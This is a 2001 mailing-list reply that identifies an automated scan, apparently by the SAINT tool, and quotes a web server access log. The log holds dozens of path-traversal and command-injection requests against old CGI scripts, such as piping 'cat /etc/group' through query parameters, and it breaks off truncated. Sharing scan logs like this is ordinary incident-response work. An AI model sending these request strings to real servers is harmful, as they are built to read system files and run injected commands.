Security Incidents mailing list archives
Re: Very thorough scan of web apps-
From: J Jewitt <jjewitt2001 () yahoo com>
Date: Wed, 15 Aug 2001 07:48:30 -0700 (PDT)
Appears to be by SAINT, web site is www.wwdsi.com. --- jamie rishaw <jamie () arpa com> wrote:
Hardcore scan of our web server.. Does this look familiar to anyone? [ LOG :: ] 69warp87.newtel.com - - [14/Aug/2001:12:56:16 -0400] "QUIT" 501 - 69warp87.newtel.com - - [14/Aug/2001:13:06:18 -0400] "QUIT" 401 - 69warp87.newtel.com - - [14/Aug/2001:13:07:35 -0400] "GET /n0nexi5tent_fi1e.html HTTP/1.0" 401 468 69warp87.newtel.com - - [14/Aug/2001:13:07:35 -0400] "GET /n0nexi5tent_fi1e.html HTTP/1.0" 401 468 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] "GET / HTTP/1.0" 401 468 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/group HTTP/1.0" 400 371 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini HTTP/1.0" 400 375 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] "GET /../../../../../etc/group HTTP/1.0" 400 351 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] "GET /../../../../../winnt/win.ini HTTP/1.0" 400 355 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] "GET /../../../../..winnt/win.ini HTTP/1.0" 400 354 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] "GET /.../.../.../.../.../etc/group HTTP/1.0" 401 468 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] "GET /.../.../.../.../.../winnt/win.ini HTTP/1.0" 401 468 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] "GET /../../../../../etc/group HTTP/1.0" 400 351 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] "GET /../../../../../winnt/win.ini HTTP/1.0" 400 355 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] "GET /cgi-bin/webdist.cgi?distloc=;/bin/cat%20/etc/group HTTP/1.0" 40 4 284 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/campas?%0acat%0a/etc/group%0a HTTP/1.0" 404 279 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/htmlscript?../../../../../../etc/group HTTP/1.0" 404 28 3 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/php.cgi?/etc/group HTTP/1.0" 404 280 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/pfdispaly?../../../../../../etc/group HTTP/1.0" 404 282 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] "GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/group HTTP/1.0" 404 286 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] "GET /cgi-bin/view-source?../../../../../../etc/group HTTP/1.0" 404 2 84 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] "GET /cgi-bin/htsearch?exclude=%60/etc/group%60 HTTP/1.0" 404 281 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] "GET
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/cat%20/etc/g
roup HTTP/1.0" 404 285 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] "GET /cgi-bin/faxsurvey?/bin/cat%20/etc/group HTTP/1.0" 404 282 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] "GET /cgi-bin/counterfiglet/nc/f=;cat%20/etc/group HTTP/1.0" 404 307 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] "GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/group| HTTP/1.0" 4 04 290 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] "GET
/cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/group|
HT TP/1.0" 404 299 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] "GET
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/group%00
HTTP /1.0" 404 300 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] "GET
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/grou
p HTTP/1.0" 404 286 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] "GET
/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../et
c/group HTTP/1.0" 404 284 69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] "GET /cgi-bin/htgrep?file=index.html&hdr=/etc/group HTTP/1.0" 404 279 69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] "GET
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../..
/../../etc/group%00 HTTP/1.0" 404 280 69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] "GET
/search97cgi/vtopic?action=view&ViewTemplate=../../../../../etc/
group HTTP/1.0" 401 468 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/multihtml.pl?multi=/etc/group%00html HTTP/1.0" 404 285 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/query?mss=../config HTTP/1.0" 404 278 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group HTTP/1.0" 40 0 377 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/webplus?script=/../../../../etc/group HTTP/1.0" 404 280 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] "GET /cgi-bin/webplus.exe?script=/../../../../etc/group HTTP/1.0" 404 284 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] "GET /cgi-bin/webplus.cgi?script=/../../../../etc/group HTTP/1.0" 404 284 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] "GET
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20Content-Type
:%20text%2Fhtml%3Becho%20%20%3B%20cat%20%2Fetc%2Fgroup%00
HTTP/1.0" 404 284 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] "GET /cgi-bin/bbs_forum.cgi?read=../../../../etc/group HTTP/1.0" 404 286 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] "GET
/cgi-bin/bbs/bbs_forum.cgi?read=../../../../etc/group
HTTP/1.0" 404 290 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] "GET /cgi-bin/man-cgi?%20/etc/group%20 HTTP/1.0" 404 280 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] "GET /opendir.php?requesturl=/etc/group HTTP/1.0" 401 468 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] "GET
/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4
vZXRjL2dyb3VwAAo HTTP/1.0" 401 468 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] "GET
/cgi-bin/talkback.cgi?article=../../../../../etc/group%00&action
=view&matchview=1 HTTP/1.0" 404 285 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] "GET /cgi-bin/cal_make.pl?p0=../../../../../etc/group%00 HTTP/1.0" 40 4 284 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] "GET
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/group
HTTP /1.0" 404 292 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] "GET /cgi-bin/test-cgi HTTP/1.0" 403 285 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] "GET /cgi-bin/dumpenv.pl HTTP/1.0" 404 283 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 285 69warp87.newtel.com - - [14/Aug/2001:13:07:49 -0400] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 284 69warp87.newtel.com - - [14/Aug/2001:13:07:52 -0400] "GET /cgi-bin/wwwboard.cgi HTTP/1.0" 404 285 69warp87.newtel.com - - [14/Aug/2001:13:07:52 -0400] "GET /cgi-bin/wwwboard HTTP/1.0" 404 281 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] "GET /cgi-bin/wrap HTTP/1.0" 404 277 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] "GET /cgi-bin/wrap.pl HTTP/1.0" 404 280 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] "GET /cgi-bin/wrap.cgi HTTP/1.0" 404 281 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] "GET /cgi-bin/finger HTTP/1.0" 404 279 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] "GET /cgi-bin/finger.pl HTTP/1.0" 404 282 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] "GET /cgi-bin/finger.cgi HTTP/1.0" 404 283 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] "GET
=== message truncated === __________________________________________________ Do You Yahoo!? Make international calls for as low as $.04/minute with Yahoo! Messenger http://phonecard.yahoo.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Very thorough scan of web apps- jamie rishaw (Aug 14)
- Re: Very thorough scan of web apps- Hugo van der Kooij (Aug 14)
- Re: Very thorough scan of web apps- J Jewitt (Aug 15)